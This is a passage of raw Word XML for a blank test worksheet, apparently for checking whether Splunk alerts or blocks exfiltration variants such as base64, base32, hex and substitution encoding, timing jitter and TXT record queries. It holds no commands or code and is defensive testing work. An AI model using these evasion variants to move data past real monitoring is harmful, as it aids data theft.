              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Blocked?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="1E6C697E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Splunk Alert?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="4017B8AD" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Time to Alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="69149DA3" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Rule Triggered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="56F0596B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="7712842E" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5C717233" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0736E539" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Rapid bulk base64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="60047540" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="26130546" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="42BE0CEC" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="10027FF2" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4AF321F5" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6C6A92F0" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4F93E059" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="4789084B" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1C65CE5A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="08AA0D11" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Fixed 3s delay</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7EC40BC1" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4203EF5D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2C028D31" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="78EF526F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="103A7107" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2D0EC108" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2A101F2F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="7869262F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6F100441" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="548017BD" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Random jitter 2-8s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="511B9DAD" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2B7CE4E5" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7165E002" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6C4F9D1E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="454B736C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7A97C2E2" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2B1C5156" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="12A280AD" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="74EAC006" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>4a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6CD59632" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Base32 encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="58EFEB48" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="07221163" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4101A97A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="77CF9518" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7197A982" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="624EE0BA" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="07102D32" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="0B671C1A" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7F2F3872" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>4b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5195782E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Hex encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6E3065D5" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="51BF9683" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3DFDFC6D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="53C9BD75" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7D7625DD" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="389792DC" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="29E9DA44" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="0A218531" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0DADCA2B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>4c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="5F319A5A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Custom substitution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0CFB5A85" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="21CC6268" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="38E7EB33" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3436DEF1" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="38138E1B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="613F7161" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="59ED92B1" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="44E082D2" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="42FF6A10" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>5a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5B94C9AB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>TXT record queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="76098780" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1066" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
